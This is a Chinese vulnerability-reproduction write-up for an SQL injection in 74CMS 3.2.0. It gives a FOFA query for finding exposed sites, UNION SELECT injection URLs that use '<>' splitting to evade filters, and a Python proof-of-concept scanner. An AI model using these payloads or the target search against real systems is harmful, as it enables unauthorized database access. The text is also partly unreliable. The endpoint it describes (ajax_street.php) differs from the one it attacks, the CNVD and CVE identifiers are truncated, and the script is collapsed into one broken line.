文章目录
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)1.74CMS(骑士CMS)简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)
1.74CMS(骑士CMS)简介
微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发
74CMS是太原迅易科技有限公司基于ThinkPHP框架二次开发的人才招聘系统。
2.漏洞描述
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
CNVD--43389
CVE--22208
CNNVD-06-1336
3.影响版本
74CMS 3.2.0
4.fofa查询语句
app=“骑士-74CMS”
5.漏洞复现
http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,version(),5,6,7,8,9%23
http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(123),5,6,7,8,9%23
6.POC&EXP
用法:poc.py http://127.0.0.1/
#!usr/bin/env python# *-* coding:utf-8 *-*import requestsimport jsonimport sysimport urllib3urllib3.disable_warnings()def poc(arg):vuln_url = arg + "plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(123),5,6,7,8,9%23"try:r = requests.post(vuln_url,verify=False,timeout=20,allow_redirects=False)if '202cb962ac59075b964b07152d234b70' in r.text:print('存在漏洞:'+vuln_url)except Exception as e:print('出错:'+str(e))passurl=sys.argv[1] poc(url)
7.整改意见
厂商尚未提供漏洞修复方案,请关注厂商主页更新: /